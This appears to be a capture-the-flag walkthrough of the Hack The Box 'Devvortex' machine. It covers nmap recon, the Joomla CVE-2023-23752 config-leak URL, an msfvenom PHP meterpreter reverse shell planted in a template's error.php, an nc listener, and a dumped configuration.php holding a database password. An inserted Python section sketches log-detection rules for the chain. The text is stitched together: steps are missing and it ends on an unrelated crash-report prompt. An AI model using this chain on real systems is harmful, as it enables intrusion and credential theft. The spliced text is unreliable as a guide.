┌──(kali㉿kali)-[~/htb/devvortex]
└─$ sudo nmap -sS -oA nmap/initial_scan 10.129.240.236
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 11:21 EST
Nmap scan report for 10.129.240.236
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 2.34 seconds

┌──(kali㉿kali)-[~/htb/devvortex]
└─$ sudo nmap -sC -sV -p 22,80 10.129.240.236
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 11:29 EST
Nmap scan report for 10.129.240.236
Host is up (0.14s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.87 seconds
Foothold
Added the vhost to the hosts file
┌──(kali㉿kali)-[~/htb/devvortex]
└─$ echo '10.129.240.236 devvortex.htb' | sudo tee -a /etc/hosts
10.129.240.236 devvortex.htb
The robots.txt file carries Joomla's standard header comment, which already identifies the CMS:

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html
http://dev.devvortex.htb/administrator/ is a Joomla admin login page
http://dev.devvortex.htb/administrator/manifests/files/joomla.xml exposes the Joomla version
<extension type="file" method="upgrade">
  <name>files_joomla</name>
  <author>Joomla! Project</author>
  <authorEmail>admin@joomla.org</authorEmail>
  <authorUrl>www.joomla.org</authorUrl>
  <copyright>(C) 2019 Open Source Matters, Inc.</copyright>
  <license>
    GNU General Public License version 2 or later; see LICENSE.txt
  </license>
  <version>4.2.6</version>
----------------------SNIPPED----------------------------
Joomla 4.2.6 is vulnerable to an authentication bypass that results in an information leak (CVE-2023-23752): if I go to http://dev.devvortex.htb/api/index.php/v1/config/application?public=true, it reveals the login credentials stored in the site configuration.
┌──(kali㉿kali)-[~/htb/devvortex/files]
└─$ msfvenom -p php/meterpreter LHOST=10.10.14.107 LPORT=1234 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 2997 bytes
Saved as: shell.php
Heading to System > Site Templates > Cassiopeia Details and Files, I opened error.php and replaced the entire contents of the file with the contents of shell.php.
Listen on port 1234
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
cat configuration.php
<?php
class JConfig {
	public $offline = false;
	public $offline_message = 'This site is down for maintenance.<br>Please check back again soon.';
	public $display_offline_message = 1;
	public $offline_image = '';
	public $sitename = 'Development';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = 20;
	public $access = 1;
	public $debug = false;
	public $debug_lang = false;
	public $debug_lang_const = true;
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'lewis';
	public $password = 'P4ntherg0t1n5r3c0n##';
	public $db = 'joomla';
	public $dbprefix = 'sd4fg_';
	public $dbencryption = 0;
	public $dbsslverifyservercert = false;
	public $dbsslkey = '';
	public $dbsslcert = '';
	public $dbsslca = '';
	public $dbsslcipher = '';
	public $force_ssl = 0;
	public $live_site = '';
	public $secret = 'ZI7zLTbaGKliS9gq';
	public $gzip = false;
	public $error_reporting = 'default';
	public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
	public $offset = 'UTC';
	public $mailonline = true;
	public $mailer = 'mail';
	public $mailfrom = 'lewis@devvortex.htb';
	public $fromname = 'Development';
	public $sendmail = '/usr/sbin/sendmail';
	public $smtpauth = false;
	public $smtpuser = '';
	public $smtppass = '';
	public $smtphost = 'localhost';
	public $smtpsecure = 'none';
	public $smtpport = 25;
	public $caching = 0;
	public $cache_handler = 'file';
	public $cachetime = 15;
	public $cache_platformprefix = false;
	public $MetaDesc = '';
	public $MetaAuthor = true;
	public $MetaVersion = false;
	public $robots = '';
	public $sef = true;
	public $sef_rewrite = false;
	public $sef_suffix = false;
	public $unicodeslugs = false;
	public $feed_limit = 10;
	public $feed_email = 'none';
	public $log_path = '/var/www/dev.devvortex.htb/administrator/logs';
	public $tmp_path = '/var/www/dev.devvortex.htb/tmp';
	public $lifetime = 15;
	public $session_handler = 'database';
	public $shared_session = false;
	public $session_metadata = true;
}
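A defender's counterpart to the chain above, added here as an example and not part of the original writeup: it runs simple detection rules over constructed nginx access-log lines, flagging the version-manifest read, the unauthenticated config-endpoint hit (CVE-2023-23752), the template-file save and a direct request to the template's error.php, then correlates hits per source address. The log lines, the `task=template.save` request shape and the `/templates/cassiopeia/error.php` path are assumptions, not taken from the box.

```python
import re

# Constructed nginx access-log lines (combined format) modelled on the requests in this
# writeup; the com_templates POST is the assumed shape of a Joomla 4 template-file save.
SAMPLE_LOG = """\
10.10.14.107 - - [26/Nov/2023:11:35:01 -0500] "GET /robots.txt HTTP/1.1" 200 764 "-" "Mozilla/5.0"
10.10.14.107 - - [26/Nov/2023:11:36:44 -0500] "GET /administrator/manifests/files/joomla.xml HTTP/1.1" 200 1502 "-" "Mozilla/5.0"
10.10.14.107 - - [26/Nov/2023:11:38:09 -0500] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 2310 "-" "curl/8.4.0"
10.10.14.107 - - [26/Nov/2023:11:49:30 -0500] "POST /administrator/index.php?option=com_templates&task=template.save HTTP/1.1" 303 0 "-" "Mozilla/5.0"
10.10.14.107 - - [26/Nov/2023:11:50:12 -0500] "GET /templates/cassiopeia/error.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.20 - - [26/Nov/2023:12:01:00 -0500] "GET /index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Rules as (name, predicate over method, path, status), ordered recon -> post-exploitation.
RULES = [
    # The version manifest is world-readable in Joomla 4: a hit is recon, not an attack by itself.
    ("joomla-version-disclosure",
     lambda m, p, s: p.startswith("/administrator/manifests/files/joomla.xml")),
    # CVE-2023-23752: an unauthenticated 200 from this endpoint means the config was served.
    ("cve-2023-23752-config-leak",
     lambda m, p, s: p.startswith("/api/index.php/v1/config/application") and s == 200),
    # Saving a template file through the admin editor is how the web shell was planted here.
    ("template-file-save",
     lambda m, p, s: m == "POST" and "option=com_templates" in p and "task=template." in p),
    # Joomla includes template PHP files server-side; a direct request to one is a shell trigger.
    ("direct-template-php-request",
     lambda m, p, s: re.match(r"^/templates/[^/]+/[^?]*\.php", p) is not None),
]

def scan_log(text: str) -> list[dict[str, object]]:
    """Run every rule over every parseable line; one finding per (line, rule) hit."""
    findings: list[dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        method, path, status = m["method"], m["path"], int(m["status"])
        for name, hit in RULES:
            if hit(method, path, status):
                findings.append({"line": lineno, "ip": m["ip"], "rule": name, "path": path})
    return findings

def correlate(findings: list[dict[str, object]]) -> dict[str, set[str]]:
    """Group rule names per source IP: one client tripping all of them is the whole chain."""
    by_ip: dict[str, set[str]] = {}
    for f in findings:
        by_ip.setdefault(str(f["ip"]), set()).add(str(f["rule"]))
    return by_ip
```

Feeding the real access log through `scan_log` and alerting when `correlate` shows one address with the config-leak and template-save rules together gives a high-confidence signal for this exact chain.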
The collected information can be sent to the developers to improve the application. This might take a few minutes.
..................

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (3.6 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): v